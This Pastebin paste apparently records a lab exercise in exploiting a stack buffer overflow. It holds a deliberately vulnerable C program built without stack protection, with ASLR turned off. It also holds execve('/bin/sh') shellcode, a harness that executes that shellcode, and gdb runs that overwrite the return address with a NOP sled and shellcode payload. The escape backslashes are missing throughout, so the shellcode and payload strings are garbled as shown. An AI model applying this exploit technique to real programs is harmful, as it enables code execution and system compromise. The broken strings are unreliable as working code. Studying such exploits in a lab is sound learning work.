API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 19th, 2019
101
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. root@kali:/tmp# cat /proc/sys/kernel/randomize_va_space
  2. 0
  3.  
  4. GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
  5. 0x0000000000000000 0x0000000000000000 RWE 0x10
  6.  
  7. root@kali:/tmp# file vuln2
  8. vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped
  9.  
  10. root@kali:/tmp# lscpu | grep 'Byte Order'
  11. Byte Order: Little Endian
  12.  
  13. #include <stdio.h>
  14.  
  15. int main(int argc, char *argv[]){
  16. char buf[512];
  17. strcpy(buf, argv[1]);
  18. return 0;
  19. }
  20.  
  21. gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack
  22.  
  23. x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05
  24.  
  25. #include <sys/mman.h>
  26. #include <stdint.h>
  27.  
  28. char code[] = "x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05";
  29.  
  30. int main(){
  31. mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC);
  32. (*(void(*)()) code)();
  33. return 0;
  34. }
  35.  
  36. (gdb) r $(python -c 'print "A"*526')
  37. The program being debugged has been started already.
  38. Start it from the beginning? (y or n) y
  39. Starting program: /tmp/vuln2 $(python -c 'print "A"*526')
  40.  
  41. Program received signal SIGSEGV, Segmentation fault.
  42. 0x0000414141414141 in ?? ()
  43. (gdb) x/x $rip
  44. 0x414141414141: Cannot access memory at address 0x414141414141
  45.  
  46. (gdb) x/100x $rsp
  47. 0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
  48. 0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
  49. 0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
  50. 0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
  51.  
  52. (gdb) x/x $rbp
  53. 0x7fffffffdf70: 0x41414141
  54.  
  55. (gdb) r $(python -c 'print "x90"*495+"x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05"+"x90xddxffxffxffx7f"')
  56. The program being debugged has been started already.
  57. Start it from the beginning? (y or n) y
  58. Starting program: /tmp/vuln2 $(python -c 'print "x90"*495+"x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05"+"x90xddxffxffxffx7f"')
  59.  
  60. Program received signal SIGILL, Illegal instruction.
  61. 0x00007fffffffdf73 in ?? ()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!